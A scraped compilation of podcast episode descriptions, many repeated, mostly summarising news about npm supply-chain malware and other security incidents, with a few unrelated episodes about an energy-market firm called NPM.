⬥EPISODE NOTES⬥Modern application development depends on open source packages moving at extraordinary speed. Paul McCarty, Offensive Security Specialist focused on software supply chain threats, explains why that speed has quietly reshaped risk across development pipelines, developer laptops, and CI environments.JavaScript dominates modern software delivery, and the npm registry has become the largest package ecosystem in the world. Millions of packages, thousands of daily updates, and deeply nested dependency chainsഴ് often exceeding a thousand indirect dependencies per application. That scale creates opportunity, not only for innovation, but for adversaries who understand how developers actually build software.This conversation focuses on a shift that security leaders can no longer ignore. Malicious packages are not exploiting accidental coding errors. They are intentionally engineered to steal credentials, exfiltrate secrets, and compromise environments long before traditional security tools see anything wrong. Attacks increasingly begin on developer machines through social engineering and poisoned repositories, then propagate into CI pipelines where access density and sensitive credentials converge.Paul outlines why many existing security approaches fall short. Vulnerability databases were built for mistakes, not hostile code. AppSec teams are overloaded burning down backlogs. Security operations teams rarely receive meaningful telemetry from build systems. The result is a visibility gap where malicious code can run, disappear, and leave organizations unsure what was touched or stolen.The episode also explores why simple advice like “only use vetted packages” fails in practice. Open source ecosystems move too fast for manual approval models, and internal package repositories often collapse under friction. Meanwhile, attackers exploit maintainer accounts, typosquatting domains, and ecosystem trust to reach billions of downstream installations in a single event.This discussion challenges security leaders to rethink how software supply chain risk is defined, detected, and owned. The problem is no longer theoretical, and it no longer lives only in development teams. It sits at the intersection of intellectual property, identity, and delivery velocity, demanding attention from anyone responsible for protecting modern software-driven organizations.⬥GUEST⬥Paul McCarty, NPM Hacker and Software Supply Chain Researcher  | On LinkedIn: https://www.linkedin.com/in/mccartypaul/⬥HOST⬥Sean Martin, Co-Founder at ITSPmagazine and Host of Redefining CyberSecurity Podcast | On LinkedIn: https://www.linkedin.com/in/imsmartin/ | Website: https://www.seanmartin.com⬥RESOURCES⬥LinkedIn Post: https://www.linkedin.com/posts/mccartypaul_i-want-to-introduce-you-to-my-latest-project-activity-7396297753196363776-1N-TOpen Source Malware Database: https://opensourcemalware.comOpenSSF Scorecard Project: https://securityscorecards.dev⬥ADDITIONAL INFORMATION⬥✨ More Redefining CyberSecurity Podcast: 

⬥EPISODE NOTES⬥Modern application development depends on open source packages moving at extraordinary speed. Paul McCarty, Offensive Security Specialist focused on software supply chain threats, explains why that speed has quietly reshaped risk across development pipelines, developer laptops, and CI environments.JavaScript dominates modern software delivery, and the npm registry has become the largest package ecosystem in the world. Millions of packages, thousands of daily updates, and deeply nested dependency chainsഴ് often exceeding a thousand indirect dependencies per application. That scale creates opportunity, not only for innovation, but for adversaries who understand how developers actually build software.This conversation focuses on a shift that security leaders can no longer ignore. Malicious packages are not exploiting accidental coding errors. They are intentionally engineered to steal credentials, exfiltrate secrets, and compromise environments long before traditional security tools see anything wrong. Attacks increasingly begin on developer machines through social engineering and poisoned repositories, then propagate into CI pipelines where access density and sensitive credentials converge.Paul outlines why many existing security approaches fall short. Vulnerability databases were built for mistakes, not hostile code. AppSec teams are overloaded burning down backlogs. Security operations teams rarely receive meaningful telemetry from build systems. The result is a visibility gap where malicious code can run, disappear, and leave organizations unsure what was touched or stolen.The episode also explores why simple advice like “only use vetted packages” fails in practice. Open source ecosystems move too fast for manual approval models, and internal package repositories often collapse under friction. Meanwhile, attackers exploit maintainer accounts, typosquatting domains, and ecosystem trust to reach billions of downstream installations in a single event.This discussion challenges security leaders to rethink how software supply chain risk is defined, detected, and owned. The problem is no longer theoretical, and it no longer lives only in development teams. It sits at the intersection of intellectual property, identity, and delivery velocity, demanding attention from anyone responsible for protecting modern software-driven organizations.⬥GUEST⬥Paul McCarty, NPM Hacker and Software Supply Chain Researcher  | On LinkedIn: https://www.linkedin.com/in/mccartypaul/⬥HOST⬥Sean Martin, Co-Founder at ITSPmagazine and Host of Redefining CyberSecurity Podcast | On LinkedIn: https://www.linkedin.com/in/imsmartin/ | Website: https://www.seanmartin.com⬥RESOURCES⬥LinkedIn Post: https://www.linkedin.com/posts/mccartypaul_i-want-to-introduce-you-to-my-latest-project-activity-7396297753196363776-1N-TOpen Source Malware Database: https://opensourcemalware.comOpenSSF Scorecard Project: https://securityscorecards.dev⬥ADDITIONAL INFORMATION⬥✨ More Redefining CyberSecurity Podcast: 

Get featured on the show by leaving us a Voice Mail: https://bit.ly/MIPVM

In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community.For for more information about Cybersecurity Cares, visit cybersecurity-cares.comThe Tomiris cyber-espionage group, which has been under Kaspersky's watch since 2021, has evolved its tactics in a new wave of attacks observed in early 2025. Article #2.CISA has recently added CVE-2021-26829 to its known exploited vulnerabilities, or KEV catalog, marking it as a confirmed threat based on real world exploitation. Researchers at KOI Security have identified a malicious NPM package, which not only performs typical credential stealing behavior, but also includes a new, subtle tactic attempting to manipulate AI-driven security scanners via embedded prompt engineering. Article #2.Iranian state sponsored threat group MuddyWater has launched a new wave of cyber espionage attacks targeting Israeli organizations across sectors including academia, civil infrastructure, engineering, technology and utilities.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform.This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

On this week's episode, esVolta CEO Randy Mann joins Andrew Burnes to discuss some of the issues facing a well-established storage IPP in the 2025 market landscape.The conversation includes a look into the realities of FEOC and the status of domestic and alternative supply, including alternate chemistries, as well as a look at how storage values are holding in ERCOT as new storage capacity enters the market.Randy also discusses the logistics and risk of entering newer markets and gets specific on which ones the firm will be targeting in the next couple of years.NPM is a leading data, intelligence & events company providing business development led coverage of the US & European power, storage & data center markets for the development, finance, M&A and corporate community.Download our mobile app.

Linux 6.18 is officially out, and officially an LTS release, 6.19 has plenty to be excited about, including the color pipeline API. NVIDIA is making progress with Wayland and other regions, Fedora is moving away from FBCON, and Flowblade sees a Wayland-only future. NPM has a worm problem, and we're still gaining ground on Steam! For tips, we have scx for rolling your own userspace scheduler, and a fix for Yakuake for your old-school terminal needs. You can find the show notes at https://bit.ly/44ISvVi and have a great week! Host: Jonathan Bennett Co-Host: Jeff Massie Download or subscribe to Untitled Linux Show at https://twit.tv/shows/untitled-linux-show Want access to the ad-free video and exclusive features? Become a member of Club TWiT today! https://twit.tv/clubtwit Club TWiT members can discuss this episode and leave feedback in the Club TWiT Discord.

Linux 6.18 is officially out, and officially an LTS release, 6.19 has plenty to be excited about, including the color pipeline API. NVIDIA is making progress with Wayland and other regions, Fedora is moving away from FBCON, and Flowblade sees a Wayland-only future. NPM has a worm problem, and we're still gaining ground on Steam! For tips, we have scx for rolling your own userspace scheduler, and a fix for Yakuake for your old-school terminal needs. You can find the show notes at https://bit.ly/44ISvVi and have a great week! Host: Jonathan Bennett Co-Host: Jeff Massie Download or subscribe to Untitled Linux Show at https://twit.tv/shows/untitled-linux-show Want access to the ad-free video and exclusive features? Become a member of Club TWiT today! https://twit.tv/clubtwit Club TWiT members can discuss this episode and leave feedback in the Club TWiT Discord.

This week we welcome Ed Skoudis to talk about the holiday hack challenge (https://sans.org/HolidayHack). In the security news: Oh Asus Dashcam botnets Weird CVEs being issued CodeRED, but not the worm Free IP checking Internet space junk and IoT Decade old Linux kernel vulnerabilities Breaking out of Claude code Malicious LLMs Hacker on a plan gets 7 years Putting passwords into random websites NPM supply chains strike again LLMs will never be intelligent Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-903

This week we welcome Ed Skoudis to talk about the holiday hack challenge (https://sans.org/HolidayHack). In the security news: Oh Asus Dashcam botnets Weird CVEs being issued CodeRED, but not the worm Free IP checking Internet space junk and IoT Decade old Linux kernel vulnerabilities Breaking out of Claude code Malicious LLMs Hacker on a plan gets 7 years Putting passwords into random websites NPM supply chains strike again LLMs will never be intelligent   Show Notes: https://securityweekly.com/psw-903

This week we welcome Ed Skoudis to talk about the holiday hack challenge (https://sans.org/HolidayHack). In the security news: Oh Asus Dashcam botnets Weird CVEs being issued CodeRED, but not the worm Free IP checking Internet space junk and IoT Decade old Linux kernel vulnerabilities Breaking out of Claude code Malicious LLMs Hacker on a plan gets 7 years Putting passwords into random websites NPM supply chains strike again LLMs will never be intelligent   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-903

This week we welcome Ed Skoudis to talk about the holiday hack challenge (https://sans.org/HolidayHack). In the security news: Oh Asus Dashcam botnets Weird CVEs being issued CodeRED, but not the worm Free IP checking Internet space junk and IoT Decade old Linux kernel vulnerabilities Breaking out of Claude code Malicious LLMs Hacker on a plan gets 7 years Putting passwords into random websites NPM supply chains strike again LLMs will never be intelligent   Show Notes: https://securityweekly.com/psw-903

SmartTube Android App Compromise The key a developer used to sign the Android YouTube player SmartTube was compromised and used to publish a malicious version. https://github.com/yuliskov/SmartTube/issues/5131#issue-3670629826 https://github.com/yuliskov/SmartTube/releases/tag/notification Two Years, 17K Downloads: The NPM Malware That Tried to Gaslight Security Scanners Over the course of two years, a malicious NPM package was updated to evade detection and has now been identified, in part, due to its attempt to bypass AI scanners through prompt injection. https://www.koi.ai/blog/two-years-17k-downloads-the-npm-malware-that-tried-to-gaslight-security-scanners Stored XSS Vulnerability via SVG Animation, SVG URL, and MathML Attributes Angular fixed a store XSS vulnerability. https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49

Im Podcast kränkelt's: Bei Cloudflare gab es einen dreistündigen Schluckauf, der Co-Host hat Hustenanfälle und Würmer befielen mal wieder NPM. Christopher und Sylvester schauen sich ausgiebig an, was die zweite Ausgabe der Javascript-Schadsoftware "Sha1-Hulud" anders macht als die erste und befassen sich auch noch einmal mit "Glassworm", einem Thema der letzten Folgen. Dort ist im Nachhinein unklar, ob es sich tatsächlich um einen Wurm handelt oder vielleicht eher ein Botnet, wie Christopher mutmaßt. Doch auch der dreistündige Ausfall bei Cloudflare steht auf der Tagesordnung - mit ungewohnt viel Lob der Hosts! - und ob Whatsapp wirklich das größte Datenleck der Geschichte hatte, ergründen die beiden heise-Redakteure ebenfalls. - Cloudflare zum Ausfall am 18. November: https://blog.cloudflare.com/18-november-2025-outage/ - Threema zum WhatsApp-Scraping: https://threema.com/de/blog/whatsapp-datenleck-2025 - Trend Micros technische Analyse von Shai Hulud 2.0: https://www.trendmicro.com/en_us/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html - Expel zu Cache Smuggling: https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/ - Folgt uns im Fediverse: - @christopherkunz@chaos.social - @syt@social.heise.de

Laura Pagliarulo, CEO and co-founder of SolaREIT, joins the podcast this week to discuss the rise of powered land banks to support data centers and other forms of load demand. Later in the program, she also discusses the forecast for US battery energy storage and what growth might look like with FEOC restrictions being implemented in January 2026.*This podcast is sponsored by Meter.Meter provides full-stack, integrated networking. They design, deploy, and manage wired, wireless, and cellular infrastructure for large data center campuses, warehouses, and branch offices.With Meter, businesses get fast, secure, and scalable connectivity for a predictable monthly rate, without the complexity of managing multiple providers or tools.Go to meter.com/npm to book a demo today! NPM is a leading data, intelligence & events company providing business development led coverage of the US & European power, storage & data center markets for the development, finance, M&A and corporate community.Download our mobile app.

(Presented by Material Security (https://material.security): We protect your company's most valuable materials -- the emails, files, and accounts that live in your Google Workspace and Microsoft 365 cloud offices.) Three Buddy Problem - Episode 74: We attempt to parse the rumor-fog around Microsoft's CISO at CYBERWARCON and what it reveals about the company's shifting posture on intel sharing, regulation, and its outsized grip on the security ecosystem. Plus, coverage of the Shai-Hulud npm supply-chain mess, CISA's mobile spyware guidance, NSO's legal contortions, a sharp new GRU-linked intrusion from Arctic Wolf. We also discuss the FCC retreating on telco security rules, and the emerging AI arms race shaping how cloud giants hunt threats and how Washington misunderstands all of it. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Ryan Naraine (https://twitter.com/ryanaraine) and Costin Raiu (https://twitter.com/craiu).

In this episode, the host addresses a previous mistake in naming a company involved in a breach, correcting SitusAMC for Ascensus, and extends apologies. Key topics include US banks assessing a breach fallout from financial tech vendor SitusAMC, ransomware group CioP targeting Broadcom through Oracle's vulnerabilities, a new malware campaign hiding in Blender 3D models named SteelC, supply chain attacks in the JavaScript ecosystem through NPM packages with Shai-Hulud malware, and a phishing scam using lookalike domains to deceive Microsoft account holders. Listeners are reminded to manually type URLs to avoid phishing scams, and are informed about the Thanksgiving weekend schedule change. 00:00 Introduction and Apology 01:26 Cybersecurity Headlines 02:13 US Banks Data Theft Incident 03:44 Broadcom and Oracle ERP Breach 05:29 Blender Malware Campaign 07:45 Shai-Hulud NPM Package Attack 09:41 Phishing Campaign Targeting Microsoft Accounts 11:39 Final Thoughts and Thanksgiving Wishes

In today's episode of Cybersecurity Today, hosted by Jim Love, several major cybersecurity incidents are discussed. US banks are assessing the impact of a security breach at SitusAMC, where the ALFV ransomware group claimed to have stolen three terabytes of data. CIOP has targeted Broadcom through Oracle's E-Business Suite vulnerabilities. A new malware campaign hides inside Blender 3D models, exploiting the auto-run feature to deploy Steel C malware. The JavaScript ecosystem faces a supply chain attack from the Shai-Hulud malware compromising 500 NPM packages. Additionally, a phishing campaign leveraging visual deception with look-alike domains is targeting Microsoft account holders. The show is brought to you by Meter, which provides integrated networking solutions. 00:00 Introduction and Sponsor Message 00:21 US Banks Data Theft Incident 02:24 Broadcom and Oracle ERP Breach 04:09 Blender Files Supply Chain Attack 06:24 NPM Packages Compromised 08:21 Phishing Campaign Targeting Microsoft Accounts 10:19 Conclusion and Sponsor Message

Conflicts between URL mapping and URL based access control. Mapping different URLs to the same script, and relying on URL based authentication at the same time, may lead to dangerous authentication and access control gaps. https://isc.sans.edu/diary/Conflicts%20between%20URL%20mapping%20and%20URL%20based%20access%20control./32518 Sha1-Hulud, The Second Coming A new, destructive variant of the Shai-Hulud worm is currently spreading through NPM/Github repos. https://www.koi.ai/incident/live-updates-sha1-hulud-the-second-coming-hundred-npm-packages-compromised Hacklore: Cleaning up Outdated Security Advice A new website, hacklore.org, has published an open letter from former CISOs and other security leaders aimed at addressing some outdated security advice that is often repeated. https://www.hacklore.org

The latest episode of Absolute AppSec is here, with Ken Johnson and Seth Law checking in during the busy Q4 holiday season to share some fascinating insights on the evolving landscape of security and technology. They kick off by reflecting on their intensive, ever-changing "Harnessing LLMs for Application Security" courses, noting how rapidly the underlying tech evolves. The conversation quickly turns to a compelling debate: How will the rise of generative AI impact career paths for newcomers, especially given that LLMs fundamentally rely on the contributions of existing experts? While pathways may change, they agree that core human activities—like networking, contributing to projects, and maintaining a hacker mindset—will remain crucial. The hosts then dive into a fascinating discussion on the darker side of SEO, introducing the concept of Generative AI Engine Optimization (GEO), where marketers exploit AI search results through tricks like keyword-stuffed files to game rankings. They tie this to historical examples of exploitation, harkening back to Google hacking days. Finally, they cover the recent Shai Hulud 2 supply chain attack, which infected hundreds of NPM packages and utilized even more sophisticated obfuscation and delayed execution tactics than its predecessor.

Decoding Binary Numeric Expressions Didier updated his number to hex script to support simple arithmetic operations in the text. https://isc.sans.edu/diary/Decoding%20Binary%20Numeric%20Expressions/32490 Tea Token NPM Pollution The NPM repository was hit with around 150,000 submissions that did not contain any useful contributions, but instead attempted to fake contributions to earn a new tea coin. https://aws.amazon.com/blogs/security/amazon-inspector-detects-over-150000-malicious-packages-linked-to-token-farming-campaign/ IBM AIX NIMSH Vulnerabilities IBM patched several critical vulnerablities in the NIMSH daemon https://www.ibm.com/support/pages/node/7251173

Just what’s inside that commercial software you bought? Does it contain open-source components, NPM packages, or other third-party code? How could you find out? The answer is a Software Bill of Materials, or SBOM, a machine-readable inventory of a finished piece of software. Why should you care about SBOMs? Our guest, Natalie Somersall, is here... Read more »

Just what’s inside that commercial software you bought? Does it contain open-source components, NPM packages, or other third-party code? How could you find out? The answer is a Software Bill of Materials, or SBOM, a machine-readable inventory of a finished piece of software. Why should you care about SBOMs? Our guest, Natalie Somersall, is here... Read more »

Alight chairman and co-founder Harald Överholm joins NPM Europe on this week's episode to give us his take on building a Nordic solar developer into an increasingly pan-European operator of both behind-the-meter and utility-scale, grid-connected PV assets.Harald also provides insight on how data centres could power the corporate PPA market across the Nordics for years to come, how Alight is targeting microgrids for future opportunities, as well as tips for solving the grid connection impasse present in several European markets right now.NPM is a leading data, intelligence & events company providing business development led coverage of the US & European power, storage & data center markets for the development, finance, M&A and corporate community.Download our mobile app.

Josh chats with Charlie Eriksen, a security researcher at Aikido Security. We discuss the recent NPM supply chain attacks that affect hundreds of packages. Charlie shares his experiences dealing with recent security breaches, the challenges of maintaining trust in open source software, and the importance of proactive measures to safeguard open source. The rapid pace of change is impacting our security practices and what steps can be taken to foster resilience in the face of evolving threats. The show notes and blog post for this episode can be found at https://opensourcesecurity.io/2025/2025-11-npm-charlie/

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made busses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious NPM packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. Github's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now

Episode 302 of Absolute AppSec has hosts Ken Johnson and Seth Law speculating on the upcoming Global AppSec DC conference, predicting the announcement of the OWASP Top Ten 2025 edition, with Brian Glass scheduled to discuss it on the podcast. The conversation shifts to a technical discussion of OpenAI's new browser, Atlas, which is built on Chromium and includes AI capabilities. The hosts noted concern over the discovered prompt instructions for Atlas, which direct the ChatGPT agent to use browser history and available APIs to find data from the user's logged-in sites to answer ambiguous queries or fulfill requests. This functionality raises significant security concerns, as the agent's ability to comb the cache and logged-in sites could be exploited, effectively creating a "honeypot for cross-site scripting" with malicious potential like unauthorized money transfers. The hosts discussed the lack of talk submissions on Mobile Context Protocol (MCP) security at the conference, despite its growing relevance in a world of AI agents and tooling. Finally, they highlighted a new tool called SlopGuard, developed to prevent the risk of AI hallucinating non-existent, potentially malicious packages (which occurs 5-21% of the time) and attempting to install them from registries like NPM.

Hey everyone—it's Steve Edwards here, and in this episode of JavaScript Jabber, I'm joined by returning guest Feross Aboukhadijeh, founder of Socket.dev, for a deep dive into the dark and fascinating world of open source supply chain security. From phishing campaigns targeting top NPM maintainers to the now-infamous Chalk library compromise, we unpack the latest wave of JavaScript package attacks and what developers can learn from them.Feross explains how some hackers are even using AI tools like Claude and Gemini as part of their payloads—and how defenders like Socket are fighting back with AI-powered analysis of their own. We also dive into GitHub Actions vulnerabilities, the role of two-factor authentication, and the growing need for “phishing-resistant 2FA.” Whether you're an open source maintainer or just someone who runs npm install a little too often, this episode will open your eyes to how much happens behind the scenes to keep your code safe.

This is a recap of the top 10 posts on Hacker News on October 30, 2025. This podcast was generated by wondercraft.ai (00:30): Affinity Studio now freeOriginal post: https://news.ycombinator.com/item?id=45761445&utm_source=wondercraft_ai(01:53): Free software scares normal peopleOriginal post: https://news.ycombinator.com/item?id=45760878&utm_source=wondercraft_ai(03:17): The ear does not do a Fourier transform (2024)Original post: https://news.ycombinator.com/item?id=45762259&utm_source=wondercraft_ai(04:41): US declines to join more than 70 countries in signing UN cybercrime treatyOriginal post: https://news.ycombinator.com/item?id=45760328&utm_source=wondercraft_ai(06:05): Ventoy: Create bootable USB drive for ISO/WIM/IMG/VHD(x)/EFI FilesOriginal post: https://news.ycombinator.com/item?id=45760340&utm_source=wondercraft_ai(07:29): A change of address led to our Wise accounts being shut downOriginal post: https://news.ycombinator.com/item?id=45766253&utm_source=wondercraft_ai(08:52): Denmark reportedly withdraws Chat Control proposal following controversyOriginal post: https://news.ycombinator.com/item?id=45765664&utm_source=wondercraft_ai(10:16): Falling panel prices lead to global solar boom, except for the USOriginal post: https://news.ycombinator.com/item?id=45761902&utm_source=wondercraft_ai(11:40): Language models are injective and hence invertibleOriginal post: https://news.ycombinator.com/item?id=45758093&utm_source=wondercraft_ai(13:04): NPM flooded with malicious packages downloaded more than 86k timesOriginal post: https://news.ycombinator.com/item?id=45755027&utm_source=wondercraft_aiThis is a third-party project, independent from HN and YC. Text and audio generated using AI, by wondercraft.ai. Create your own studio quality podcast with text as the only input in seconds at app.wondercraft.ai. Issues or feedback? We'd love to hear from you: team@wondercraft.ai

Today on the podcast we feature the leadership team of the Jefferson City, Missouri, chapter. They are NPM's 2025 Chapter of the year! We discuss the ways the chapter has increased their membership, cultivated consistent programming, and some of the most important relationships that have strengthened the chapter.

